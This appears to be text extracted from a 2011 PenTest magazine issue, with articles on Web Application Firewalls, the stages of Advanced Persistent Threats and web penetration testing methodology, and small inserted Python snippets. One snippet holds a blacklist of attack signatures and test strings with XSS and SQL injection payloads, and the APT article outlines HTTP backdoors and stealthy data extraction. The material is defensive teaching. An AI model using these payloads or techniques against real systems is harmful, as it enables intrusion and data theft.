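    except ET.ParseError:
        return False
    return depth(root) <= MAX_DEPTH

assert xml_ok("<order><item>1</item></order>")
nested = "<a>" * 50 + "</a>" * 50   # 50 levels deep: a nesting attack
assert not xml_ok(nested)
```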
Figure 2: An overview of how a Web Application Firewall works.
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution should rely on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
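The combined approach described above can be sketched as follows. The blacklist signatures, URL prefixes and whitelist patterns are all invented and far from complete; the point is only the decision order: negative security everywhere, positive security on the high-value sub-section.

```python
import re

# Illustrative blacklist of generic attack signatures (not exhaustive):
BLACKLIST = [re.compile(p, re.I) for p in (r"<script", r"union\s+select", r"\.\./")]

# Whitelist maintained only for the high-value order entry page:
ORDER_ENTRY_WHITELIST = {"item_id": re.compile(r"^\d{1,6}$"),
                         "qty": re.compile(r"^\d{1,3}$")}

def allow(url, params):
    # 1. Negative security everywhere: reject known-bad patterns.
    for value in params.values():
        if any(sig.search(value) for sig in BLACKLIST):
            return False
    # 2. Positive security only on the order entry sub-section.
    if url.startswith("/order"):
        if set(params) != set(ORDER_ENTRY_WHITELIST):
            return False
        return all(ORDER_ENTRY_WHITELIST[k].match(v) for k, v in params.items())
    return True

assert allow("/owa/inbox", {"q": "quarterly report"})
assert not allow("/owa/inbox", {"q": "<script>alert(1)</script>"})
assert allow("/order", {"item_id": "123", "qty": "2"})
assert not allow("/order", {"item_id": "123 OR 1=1", "qty": "2"})
```

Only the whitelisted sub-section needs re-learning when the application changes, which keeps the tuning effort bounded.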
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that possibly violate the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line Bridge Path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and fast to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks, even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in line and uses both of the system's physical ports (WAN and LAN). As a proxy, WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. And special functions are only available here: as a Full Reverse Proxy, a WAF provides for example Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of the URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to avoid Denial of Service attacks), as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3: A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult.
own IT infrastructure, is the best way to evade the previously mentioned scan attacks, which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But the Proxy WAFs must also be configured to correspond with the respective terms. Penetration tests help with the correct configuration.
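The URL translation described above can be sketched with a small mapping table. The public paths and backend addresses below are wholly invented; the idea is that the public side never learns the real host, port or software behind a path.

```python
# Hypothetical public-path -> hidden backend URL mapping (all values invented):
REWRITE_MAP = {
    "/shop":  "http://10.0.0.5:8080/legacy-cart/v2",
    "/login": "http://10.0.0.6:8443/auth",
}

def rewrite(public_path):
    """Translate a public URL to the application's hidden URL, so the
    real address (host, port, software hints) stays cloaked."""
    for prefix, backend in REWRITE_MAP.items():
        if public_path.startswith(prefix):
            return backend + public_path[len(prefix):]
    return None  # unknown path: do not forward

assert rewrite("/shop/item/7") == "http://10.0.0.5:8080/legacy-cart/v2/item/7"
assert rewrite("/secret") is None
```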
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. The companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic occur via a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
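An outgoing filter of this kind can be sketched in a few lines. The pattern below is a deliberately simplified stand-in for real PAN detection (which would also check card number prefixes and the Luhn checksum):

```python
import re

# Simplified PAN pattern: any standalone run of 13-16 digits (illustrative only).
PAN = re.compile(r"\b\d{13,16}\b")

def filter_outgoing(body):
    """Mask candidate card numbers before the response leaves the zone."""
    return PAN.sub(lambda m: "*" * len(m.group()), body)

leaked = "card: 4111111111111111 ok"
assert filter_outgoing(leaked) == "card: **************** ok"
```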
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or the use of the web application. All other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and to set, then this in practice makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products, or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on the known settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (cum laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of the PenTest magazine:
• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War
Available to download on December 22nd.
If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
ADVANCED PERSISTENT THREATS
Pages 6-7, http://pentestmag.com, 01/2011 (1) November
The use of HTTP may be required because different areas are often filtered, leaving only the necessary protocols open. HTTP is often left open to allow administrators to navigate through these machines or to update them.
To remain as stealthy as possible, a strategic backdoor in the web application or the application server will use HTTP as a direct connection and/or as a tunnel to other applications. During the movement it will not be filtered, and no attention will be drawn to a process that opens a port unknown to the system.
Bounce Mechanisms
Whenever changes occur within an IT system, the steps involving initial intrusion and continued presence are repeated as many times as necessary until the goal is attained and sensitive data becomes accessible. HTTP once again comes into play during these stages, because it is predominantly active and open between the different areas:
• Dialogue between server applications
• Web Services
• Web Administration Interface
• Etc.
It often happens that security policies contain the same weaknesses from one area to another:
• Exit ports opened
• Filtering omissions on higher-level ports
• Use of the same default passwords
Data Extraction
Once crucial information is reached, it is necessary to exit the system as discreetly as possible and over a certain length of time. The HTTP protocol is often enabled for exit without being monitored, for several reasons:
• Machines are often updated using HTTP.
• When an administrator logs on to a remote machine, he will often require access to a website.
• Since these areas are often regarded as "safe" zones, restrictions are lower and controls less strict.
What Protective Measures Can Be Deployed?
Application security has become a major issue in the business world. Whereas network security is fairly conventional and primarily leans on the filtering of destinations, sources, IPs and ports, in most cases application security is more complex and involves applications that are often unique, bespoke and
Anatomy of an APT
Advanced Persistent Threats are attacks calculated for latent effect and vested with a specific purpose: that of retrieving sensitive or critical data.
Several steps are necessary to reach the goal:
• The initial intrusion
• Continued presence within the IT system
• Bounce mechanisms and in-depth infiltration
• Data extraction
HTTP plays an important role during the attacks, firstly because it is predominantly present during the various stages, and furthermore because it is often the only available protocol that can serve as an attack vector.
The Initial Intrusion
The system is invaded by an attack focused on an area exposed to the public on the Internet. In the case of the Sony PlayStation Network, for instance, the intrusion took place via their blog, which used a vulnerable version of WordPress.
These days it is unusual for any organization to do without a website, and the latter can range from basic and simple to complex and dynamic.
The website plays the role of a gateway that provides the initial point of entry into an infrastructure. It becomes an outpost that enables important information to be gathered in order to successfully carry out the rest of the attack. In addition, depending on the application infrastructure, location and lack of compartmentalization, it is possible for a simple, scarcely-used application to be found near or on the same server as a business application. The attack will bounce from the one to the other, and the business application will then become accessible and provide more access privileges.
Retrieval of information is often the vital issue during the bounce mechanism and extended infiltration into the system. Some examples of the data targeted:
• User passwords
• Hardware and network destinations -> discovery
• Connectors to other systems -> new protocols
• Etc.
Continued Presence
After the initial inroads into the structure, the next phase requires that presence within the system remains secure. The machine has to be re-accessed and exploited without arousing the suspicions of system administrators.
deployed with many more specifications relating to infrastructure. Three steps are necessary to prevent or respond properly to an APT:
• Prevention
• Response
• Forensics
Prevention
Ideally, security should be addressed at the very beginning, when the software and even the application infrastructure are still at the conception stage. It is necessary to follow certain rules which will condition the response to different threats.
Define a Secure Application Infrastructure: Partition the Network
This measure is one of the pillars of PCI-DSS, and for good reason. Keeping sections separate can limit the impact of an intrusion, making it more difficult to obtain satisfaction because of the large number of bounces required to reach sensitive data. Each zone also deploys a security policy adapted to its content, whether the flow is inbound or outbound.
Moreover, partitioning allows for easier forensic analysis in case of a compromise. It is easier to understand the steps and measure the impact and the depth of the attack when one is able to analyze each area separately. Unfortunately, there are many systems, described as flat infrastructures, that contain a variety of applications housed in the same area. After an incident has occurred, it is difficult to determine precisely which applications have been compromised and what data has been hijacked.
Separation of Applications
Applications can be separated using criteria such as data categorization or the level of risk attached to the application. Clustering provides numerous advantages:
• It promotes rationalization in the design of security policies, which are more or less complex depending on the type of data and the structure of the application to secure.
• It enhances understanding of an attack and, by doing so, facilitates the search for evidence, which will then be based on the criticality of data and complexity of applications.
Anticipate Possible Outcomes
To better understand the scope of an attack, it is necessary to anticipate the options available to a hacker once an application has been compromised. Once this is done, it is necessary to anticipate the procedures required to analyze, verify and understand the attack. We should bear in mind that an area of the infrastructure in which it is impossible to install a monitoring tool will be very complex to analyze during an incident. In such a case it is necessary to predefine the tools and procedures for investigations and/or monitoring.
Risk Analysis and Attack Guidelines
This step allows a precise understanding of risks based on the data manipulated by the applications.
It has to be carried out by studying the web applications, their operation and business logic. Once each data component has been identified, it is possible to draw up a list of rules and regulations that need to be followed by the application infrastructure.
Developer Training
Applications are commonly developed following specific business imperatives, and often with the added stress of meeting availability deadlines. Developers do not place security high up on their list of priorities, and it is often overlooked in the process.
However, there are several ways to significantly reduce risk:
• Raising developer awareness of application attacks
  • OWASP Top 10
  • WASC TC v2
• The use of libraries to filter input
  • Libraries are available for all languages
• Setting up audit functions, logs and traceability
• Accurate analysis of how the application works
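The audit and traceability item in the list above can be sketched as a hypothetical Python decorator (handler name and fields invented) that records every call to a sensitive function, so that later forensic work has something to correlate:

```python
import functools
import logging

logging.basicConfig(level=logging.INFO, format="%(asctime)s %(message)s")
log = logging.getLogger("audit")

def audited(func):
    """Wrap a request handler so every invocation is traceable in the audit log."""
    @functools.wraps(func)
    def wrapper(user, **params):
        log.info("user=%s action=%s params=%s", user, func.__name__, params)
        return func(user, **params)
    return wrapper

@audited
def transfer(user, amount, dest):
    # Hypothetical business function: the audit trail records who moved what.
    return f"{user} sent {amount} to {dest}"

result = transfer("alice", amount=100, dest="acct-42")
assert result == "alice sent 100 to acct-42"
```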
Regular Auditing: Code Analysis
You can resort to manual code analysis by an auditor, or to automated analysis using the tools available to find vulnerabilities in the source code of web applications. These tools often require complex configuration. This step is useful to detect vulnerabilities before going into production, and thus to fix them before they are exploited.
Unfortunately, this practice is only possible if you have access to the source code of the application. Closed-source software packages cannot be analyzed.
Scanning and Penetration Testing
All applications can be scanned and pentested. These tests also require configuration and/or a thorough analysis of the application to determine the credentials necessary
for navigation, or the resources to be avoided because of their capacity to cause significant damage (e.g. links enabling the deletion of entries in the database).
These tests have to be reproduced as often as possible, and whenever a change to the application is put in place by the developers.
Appropriate Response
Traditional firewalls do not filter network application protocols; at best, the so-called next-generation models can recognize a type of protocol and filter content in the manner of an IPS by recognizing attack patterns. This response is clearly inadequate.
Each zone containing web applications has to be filtered on incoming and outgoing content, and on the use of the protocol itself.
This type of deployment is often called defense in depth, and has the ability to monitor the various attacks at both the application and network levels.
Last but not least, the association of the identity context with the security policy allows better detection of anomalies.
Traffic Filtering: The WAF (Web Application Firewall)
Web application firewalls can be considered as an extension of network firewalls to the application level. They are able to analyze HTTP and the content it conveys. The device is strongly recommended by section 6.6 of PCI-DSS.
Often used in reverse proxy mode, it allows for a break in protocol and facilitates the restructuring of areas between applications.
The WAFEC document (Web Application Firewall Evaluation Criteria), published by WASC, is a useful guideline that helps to understand and evaluate different vendors as needed.
The WAF also helps to monitor and alert in case of a threat, in order to trigger a rapid response (e.g. blocking the IP of the attacker via a dialogue protocol with network firewalls).
Traffic Filtering: The WSF (Web Services Firewall)
It represents an extension of the WAF to the protocols carrying XML traffic over HTTP, such as SOAP or REST.
XML and its standards make security management easier, in the sense that the operation of the service is described by documents generated directly by the development framework (e.g. WSDL, Schemas).
Web services are vulnerable to the same attacks as web applications; they consequently need the same kind of protection. Their position in the application infrastructure, however, is much more critical. They are often located at the heart of sensitive information zones and connected directly, via private links, to partner infrastructures.
The WSF provides security on the message format and content, but also on the use of a service. The use or production of a web service entails a contract between two parties on the type of use (e.g. number of messages per day, data type, etc.). The WSF will also serve to monitor this function and to ensure respect of the SLA between the two parties.
Authentication / Authorization
Applications use identities to control access to various resources and functions. The association of the identity context and security increases efficiency in the detection of anomalies. For example, a whitelist adapted according to the type of user can verify access to information based on the user's role.
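A whitelist adapted to the type of user can be sketched as a simple role-to-resources mapping. The roles and paths below are invented for illustration:

```python
# Hypothetical role -> permitted resources mapping (names invented):
ROLE_WHITELIST = {
    "customer": {"/account", "/orders"},
    "admin":    {"/account", "/orders", "/admin/users"},
}

def anomalous(role, resource):
    """Flag access that falls outside the whitelist for this identity
    context - e.g. a customer session requesting an admin page."""
    return resource not in ROLE_WHITELIST.get(role, set())

assert not anomalous("customer", "/orders")
assert anomalous("customer", "/admin/users")   # identity context makes this suspect
```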
Ensuring Continuity of Service
Application security is primarily related to the exploitation of vulnerabilities in order to divert normal use for malicious purposes. However, some attacks based on weaknesses can be devastating in effect, perpetrated to make the application unavailable and thereby provoke losses due to activity downtime.
To counter these, it is necessary to establish protective measures that block denial of service and automated processes, and to ensure load balancing and SSL acceleration.
Operation: Monitoring
It is important to understand the use of the application during production, in order to monitor and detect abnormal behavior and make decisions accordingly:
• Blacklist
• Legal action
• Redirection to a honeypot
Log Correlation
Understanding abnormal behavior in an application helps in locating an attack.
An application infrastructure can comprise hundreds of applications.
To understand the attack as a whole and monitor changes (discovery, aggression, compromise), it is necessary to have a holistic view.
ADVANCED PERSISTENT THREATS
Page 10 httppentestmagcom012011 (1) November
To do this, it is imperative to confront and correlate logs to obtain a real-time overall analysis and understand the threat mechanics:
• Mass attack on a type of application
• Attack targeting a specific application
• Attacks focused on a type of data
Reporting and Alerting
The dialogue between application, network and security teams is often complex within an organization. Formalized reports on attacks and on the use of the application provide these teams with a basis for work and an understanding of application threats.
Alerts will enable them to react and trigger procedures, either at the network level by blocking the IP of the attacker, or at the application level by forbidding access to resource areas, or more directly by referral to a honeypot in view of analyzing the behavior of the attacker.
Forensics
Understanding the scope of an attack
For each area compromised, it is important to understand what elements have been impacted and to trace the attack to the roots of the intrusion and compromise: the installation of a backdoor, bounce mechanisms to other areas, and/or extraction of data.
Analysis of application components
To understand how the intrusion occurred, it is important to look for abnormal uses. One example could be the presence of anomalous data in a variable or a cookie. To drill down to this level, the logs of the various application components turn out to be very useful:
• Web server or application
• Database
• Directory
• Etc.
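As an illustration of this drill-down, the sketch below flags log entries whose session cookie carries characters a token should never contain. The `session=` log format is a hypothetical example, not any particular server's layout:

```python
import re

# Sketch: flag log lines whose cookie value contains characters that
# should never appear in a session token (hypothetical log format).
SUSPICIOUS = re.compile(r"[<>'\";]|--")

def find_anomalies(log_lines):
    """Return log lines whose session cookie value looks tampered with."""
    hits = []
    for line in log_lines:
        m = re.search(r"session=([^;\s]+)", line)
        if m and SUSPICIOUS.search(m.group(1)):
            hits.append(line)
    return hits
```

Running the same check over web server, database and directory logs is one crude way to correlate a single anomalous value across components.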
Systems Analysis
To understand how the attacker remained in the area, it is important to identify the type of backdoor used. From the simplest act, such as placing an executable file in the application itself, to the injection of code into a process (e.g., hooking network functions), it is necessary to analyze the system hosting the application:
• Changed configuration files
• Users added
• Security rules changed
• Errors of execution or increases in privileges
• Unknown daemons or unusual groups and users
• Etc.
Analysis of network equipment
During the various bounces within the application infrastructure, the discovery and exploration of new possibilities leaves fingerprints. Network firewalls keep precious logs with traces of these attempts. In addition, if access is logged, it is important to check whether there are connections to web applications at unusual times.
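The unusual-times check can be automated. This sketch assumes a hypothetical timestamp format and a 07:00–20:00 business-hours window; both are illustrative choices, not a standard:

```python
from datetime import datetime

# Sketch: flag logged requests outside business hours.
# Timestamp format and the 07:00-20:00 window are assumptions.
def off_hours(entries, start=7, end=20):
    """entries: iterable of (timestamp_string, client_ip) pairs."""
    flagged = []
    for ts, client in entries:
        hour = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S").hour
        if not (start <= hour < end):
            flagged.append((ts, client))
    return flagged
```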
The End Justifies the Means
In conclusion, we can see that the means used to achieve an APT are often substantial and proportional to the criticality of the targeted data. APTs are not just temporary attacks but real and constant threats, with latent effect, that need to be fought in the long run.
The security of an application infrastructure begins with the conception process and requires basic rules to be respected, to simplify security operations.
Real-life experience of application management highlights the difficulties in implementing all the good practices.
A comprehensive study of threats, appropriate response, and anticipation of possible incidents are now the recommended procedure in dealing with application attacks.
MATTHIEU ESTRADE
Matthieu Estrade has 14 years of experience in internet security. In 2001, Matthieu designed a pioneering application firewall based on Web Reverse Proxy technology for the company Axiliance. As a well-known specialist in his field, he soon became a member of the open source Apache HTTP Server development team. His security expertise has been put to contribution in WASC (Web Application Security Consortium) projects like WAFEC and WASSEC. Matthieu is also a member of the French OWASP chapter. Matthieu is currently CTO at BeeWare.
WEB APP SECURITY
Page 12 httppentestmagcom012011 (1) November
Dynamic web applications usually use technologies such as ASP, ASP.Net, PHP, Ajax, JSP, Perl, Cold Fusion and Flash.
These applications expose financial data, customer information and other sensitive and confidential data that require authentication and authorization. Ensuring that web applications are secure is a critical mission that businesses have to undertake to achieve the desired security level of such applications. With the accessibility of such critical data from the public domain, web application security testing also becomes a paramount process for all web applications that are exposed to the outside world.
Introduction
Penetration testing (also called pen testing) is usually conducted by ethical hackers, where the security team reviews application security vulnerabilities to discover potential security risks. Such a process requires deep knowledge and experience in a variety of different tools and a range of exploits that can achieve the required tasks.
During pen testing, different web applications' vulnerabilities are tested (e.g., input validation, buffer overflow, cross-site scripting, URL manipulation, SQL injection, cookie modification, bypassing authentication and code execution). A typical pen test involves the following procedures:
• Identification of Ports – In this process, ports are scanned and the associated running services are identified.
• Software Services Analyzed – In this process, both automated and manual testing is conducted to discover weaknesses.
• Verification of Vulnerabilities – This process helps verify that the vulnerabilities are real and that a weakness might be exploited, to help remediate the issues.
• Remediation of Vulnerabilities – In this process, the vulnerabilities will be resolved and then re-tested to ensure they have been addressed.
Part of the initiative of securing web applications is to include the security development lifecycle as part of the software development lifecycle, where the number of security-related design and coding defects can be reduced, and the severity of any defects that do remain undetected can be reduced or eliminated. Despite the fact that the above initiatives solve some of the security problems, some undiscovered defects will remain even in the most scrutinized web applications. Until scanners can harness true artificial intelligence and put anomalies into context or make normative judgments about them, the struggle to find certain vulnerabilities will remain.
Web Application Security and Penetration Testing

In recent years, web applications have grown dramatically within many organizations and businesses, where such entities have become very dependent on this technology as part of their businesses' lifecycle.
Automated Scanning vs. Manual Penetration Testing
A vulnerability assessment simply identifies and reports vulnerabilities, whereas a pen test attempts to exploit vulnerabilities to determine whether unauthorized access or other malicious activities are possible. By performing a pen test to simulate an attack, it's possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration, hardware or software flaws, or weaknesses in the perimeter defences protecting the application.
With more than 75% of attacks occurring over the HTTP/HTTPS protocols and more than 90% of web applications containing some type of security vulnerability, it is essential that organizations implement strong measures to secure their web applications. Most of these attacks occur at the front door of the organization, where the entire online community has access to these doors (i.e., port 80 and port 443). With the complexity and the tremendous amount of sensitive data that exist within web applications, consumers not only expect but also demand security for this information.
That said, securing a web application goes far beyond testing the application using automated systems and tools or manual processes. The security implementation begins in the conceptual phase, where the security risk introduced by the application is modeled and the required countermeasures are identified. It is imperative that web application security be thought of as another quality vector of every application, one that has to be considered through every step of the application lifecycle.
Discovering web application vulnerabilities can be performed through different processes:
• Automated process – where scanning tools or static analysis tools will be used
• Manual process – where penetration testing or code review will be used
Web application vulnerability types can be grouped into two categories:
Technical Vulnerabilities
Such vulnerabilities can be examined through tests such as cross-site scripting, injection flaws and buffer overflow. Automated systems and tools, which analyze and test web applications, are much better equipped to test for technical vulnerabilities than manual penetration tests. While automated testing and scanning tools may not be able
to address 100% of all technical vulnerabilities, there is no reason to believe that such tools will achieve that goal in the near future either. Current problems facing web application tools include the following: client-side generated URLs, required JavaScript functions, application logout, transaction-based systems requiring specific user paths, automated form submission, one-time passwords, and infinite web sites with random URL-based session IDs.
Logical Vulnerabilities
Such vulnerabilities can manipulate the logic of the application to perform tasks that were never intended. While both an automated scanning tool and a skilled penetration tester can navigate through a web application, only the latter is able to understand the logic behind a specific workflow or how the application works in general. Understanding the logic and the flow of an application allows a manual pen tester to subvert or overthrow the business logic, exposing security vulnerabilities. For instance, an application might direct the user from point A to point B to point C based on the logic flow implemented within the application, where point B represents a security validation check. A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C, bypassing the security validation that exists at point B.
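The A-to-B-to-C flaw can be reduced to a toy state check. The server-side guard below is entirely hypothetical; it models what a manual tester probes for by jumping straight to C. An application that trusts the client to visit B in order, instead of tracking it server-side, has exactly this logical vulnerability:

```python
# Sketch: the A -> B -> C flow, where B is the validation step.
# Step names and the session dict are hypothetical.
def request_step(session, step):
    """Grant step C only if this session passed validation at step B."""
    if step == "C" and not session.get("validated_at_B"):
        return "denied"
    if step == "B":
        session["validated_at_B"] = True
    return "ok"
```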
History has proven that software bugs, defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities, which can lead to unauthorized access to systems, networks and application information. It has also been shown that most security breaches occur due to vulnerabilities within the web application layer (i.e., attacks using the HTTP/HTTPS protocol). In such attacks, traditional security mechanisms such as firewalls and IDS provide little or no protection against attacks on the web applications.
Security analyses review the critical components of a web-based portal, e-commerce application or web services platform. Part of the analysis work is to identify vulnerabilities inherent in the code of the web application itself, regardless of the technology implemented, the back-end database or the web server used by the application.
It's imperative to point out that web application penetration assessments should be designed based upon a defined threat model. They should also be based upon the evaluation of the integration between components (e.g., third-party components and in-house built components) and the overall deployment configuration, which represents a solid choice for establishing a baseline security assessment. Application penetration assessments serve as a cost-effective mechanism to identify the set of vulnerabilities in a given application: they expose the most likely exploited vulnerabilities
Figure 1. The different activities of the pen testing process
and allow testers to find similar instances of vulnerabilities throughout the code.
How Web Application Pen Testing Works
Most web application penetration testing is carried out from security operations centers, where the resources under test are accessed remotely over the Internet using different penetration technologies. At the end of such a test, the application penetration test provides a comprehensive security assessment for various types of applications (e.g., commercial enterprise web applications, internally developed applications, web-based portals and e-commerce applications). Figure 1 describes some of the activities that usually happen during the pen testing process. Some of the testing processes used to achieve the security vulnerability assessment are: application spidering, authentication testing, session management testing, data validation testing, web service testing, Ajax testing, business logic testing, risk assessment and reporting.
In conducting web penetration testing, different approaches can be used to achieve the security vulnerability assessment; some of these approaches are:
• Zero-Knowledge Test (Black Box) – In this approach, the application security testing team will not have any inside information about the target environment, and the expected knowledge gained will be based on information that can be found in the public domain. This type of test is designed to provide the most realistic penetration test possible, since in many cases attackers start with no real knowledge of the target systems.
• Partial Knowledge Test (Gray Box) – In this approach, partial knowledge about the environment under test is obtained before conducting the test.
• Source Code Analysis (White Box) – In this approach, the penetration test team has full information about the application and its source code. In such a test, the security team will do a line-by-line code review in an attempt to find any flaws that could allow attackers to take control of the application, perform a denial of service attack against it, or use such flaws to gain access to the internal network.
It's also important to point out that penetration testing can be carried out as two different types of testing:
• External Penetration Testing
• Internal Penetration Testing
Both types of testing can be conducted with the least information (black box) or with full information (white box).
Figure 2. The different phases of pen testing
Figure 3 shows the different procedures and steps that can be used to conduct penetration testing. The following is a description of these steps:
• Scope and Plan – In this step, the scope of the penetration testing is identified and the project plan and resources are defined.
• System Scan and Probe – In this step, system scanning under the defined scope of the project is conducted: automated scanners examine the open ports and scan the system to detect vulnerabilities, and the hostnames and IP addresses previously collected are used at this stage.
• Creation of Attack Strategies – In this step, the testers prioritize the systems and the attack methods to be used, based on the type of each system and how critical it is. Also at this stage, the penetration testing tools are selected based on the vulnerabilities detected in the previous phase.
• Penetration Testing – In this step, the exploitation of vulnerabilities using automated tools is conducted, where the attack methods designed in the previous phase are used to conduct the following tests: data & service pilferage test, buffer overflow, privilege escalation and denial of service (if applicable).
• Documentation – In this step, all the vulnerabilities discovered during the test are documented; evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report.
• Improvement – The final step of the penetration testing is to provide the corrective actions for closing the discovered vulnerabilities within the systems and the web applications.
Web Application Testing Tools
Throughout pen testing, a specific structured methodology has to be followed, with steps such as enumeration, vulnerability assessment and exploitation. Some of the tools that might be used within these steps are:
• Port scanners
• Sniffers
• Proxy servers
• Site crawlers
• Manual inspection
The output from the above tools allows the security team to gather information about the environment, such as open ports, services, versions and operating systems. The vulnerability assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s), application server(s), database server(s) and any intermediary devices such as firewalls and load balancers. It's also important for the security team not to rely solely on tools during the assessment phase to discover vulnerabilities; manual inspection of items such as HTTP responses, hidden fields and HTML page sources should be part of the security assessment as well.
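Manual inspection of page sources can be assisted by a small script. This sketch, using only the standard library and a made-up form, pulls the hidden fields out of an HTML page so a tester can see what the application trusts the browser to return unchanged:

```python
from html.parser import HTMLParser

# Sketch: extract hidden form fields from an HTML page source,
# the kind of manual-inspection aid the text recommends.
class HiddenFields(HTMLParser):
    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden":
            self.fields[a.get("name")] = a.get("value")

def hidden_fields(html):
    parser = HiddenFields()
    parser.feed(html)
    return parser.fields
```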
Some of the areas that can be covered during the vulnerability assessment are the following:

• Input validation
• Access control
Figure 3. Testing techniques, procedures and steps
• Authentication and session management (session ID flaws) vulnerabilities
• Cross-site scripting (XSS) vulnerabilities
• Buffer overflows
• Injection flaws
• Error handling
• Insecure storage
• Denial of service (if required)
• Configuration management
• Business logic flaws
• SQL injection faults
• Cookie manipulation and poisoning
• Privilege escalation
• Command injection
• Client side and header manipulation
• Unintended information disclosure
During the assessment, testing of the above vulnerabilities is performed, except those that could cause denial of service conditions; these are usually discussed beforehand. Possible options for denial of service testing include testing during a specific time window, testing on a development system, or manually verifying the condition that may be responsible for the vulnerability. Once the vulnerability assessment is complete, the final reports, recommendations and comments are summarized and better solutions are suggested for the implementation process. Once the above assessments are done, the penetration test is half-way done and the most important part of the assessment has to be delivered: the informative report that highlights all the risks found during the penetration phase.
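Among the items assessed above, SQL injection is the canonical case of trusting browser input. The sketch below (sqlite3, with a hypothetical `users` table) shows the parameterized query that neutralizes it, next to the unsafe concatenation it replaces:

```python
import sqlite3

# Sketch: parameterized queries neutralize SQL injection in user
# input; the commented-out concatenation would not.
def find_user(conn, username):
    # UNSAFE: "SELECT name FROM users WHERE name = '" + username + "'"
    cur = conn.execute("SELECT name FROM users WHERE name = ?", (username,))
    return cur.fetchall()

# Hypothetical demo table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.execute("INSERT INTO users VALUES ('alice')")
```

With the parameterized form, a payload such as `' OR '1'='1` is matched as a literal string and returns nothing.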
The following are some of the commonly used tools for traditional penetration testing.
Port Scanners
